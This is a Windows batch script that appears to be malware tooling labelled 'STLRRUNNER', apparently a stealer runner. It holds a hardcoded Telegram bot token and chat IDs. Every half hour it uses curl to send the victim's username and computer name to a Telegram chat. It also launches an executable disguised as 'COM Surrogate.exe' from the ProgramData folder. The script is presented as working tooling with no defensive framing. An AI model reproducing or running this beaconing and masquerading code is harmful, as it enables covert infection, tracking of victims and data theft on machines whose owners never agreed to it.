@echo off


:: SEND MSG

:: Fucker CHAT ID : -1002163721260
:: Output CHAT ID : -1002460905948


:: Set bot token, chat ID, and message
set "TOKEN=7470339630:AAEwHeixYKwvT6WYutXCjBBugdjTGjTIZVA"
set "CHAT_ID=-1002163721260"
set "MESSAGEEVERY=%USERNAME%(%COMPUTERNAME%)|STLRRUNNER|30MINLEFTFORSTARTCOM..|%time%"
set "ENCODED_MESSAGE=%MESSAGEEVERY: =%%2"


curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" ^
     -d "chat_id=%CHAT_ID%" ^
     -d "text=%ENCODED_MESSAGE%"
echo Message sent to chat ID %CHAT_ID%



timeout /t 1800 /nobreak


start "" "%ProgramData%\Microsoft\Windows\COM Surrogate.exe"



set "MESSAGEEVERY=%USERNAME%(%COMPUTERNAME%)|STLRRUNNER|COMSTARTED.3H.LEFTFORSTARTCOM..|%time%"
set "ENCODED_MESSAGE=%MESSAGEEVERY: =%%2"

curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" ^
     -d "chat_id=%CHAT_ID%" ^
     -d "text=%ENCODED_MESSAGE%"





timeout /t 1800 /nobreak


set "MESSAGEEVERY=%USERNAME%(%COMPUTERNAME%)|STLRRUNNER|2H.30MIN.LEFTFORSTARTCOM..|%time%"
set "ENCODED_MESSAGE=%MESSAGEEVERY: =%%2"

curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" ^
     -d "chat_id=%CHAT_ID%" ^
     -d "text=%ENCODED_MESSAGE%"



timeout /t 1800 /nobreak


set "MESSAGEEVERY=%USERNAME%(%COMPUTERNAME%)|STLRRUNNER|2H.LEFTFORSTARTCOM..|%time%"
set "ENCODED_MESSAGE=%MESSAGEEVERY: =%%2"

curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" ^
     -d "chat_id=%CHAT_ID%" ^
     -d "text=%ENCODED_MESSAGE%"



timeout /t 1800 /nobreak


set "MESSAGEEVERY=%USERNAME%(%COMPUTERNAME%)|STLRRUNNER|1H.30MIN.LEFTFORSTARTCOM..|%time%"
set "ENCODED_MESSAGE=%MESSAGEEVERY: =%%2"

curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" ^
     -d "chat_id=%CHAT_ID%" ^
     -d "text=%ENCODED_MESSAGE%"




timeout /t 1800 /nobreak


set "MESSAGEEVERY=%USERNAME%(%COMPUTERNAME%)|STLRRUNNER|1H.LEFTFORSTARTCOM..|%time%"
set "ENCODED_MESSAGE=%MESSAGEEVERY: =%%2"

curl -s -X POST "https://api.telegram.org/bot%TOKEN%/sendMessage" ^
     -d "chat_id=%CHAT_ID%" ^
     -d "text=%ENCODED_MESSAGE%"



timeout /t 1800 /nobreak




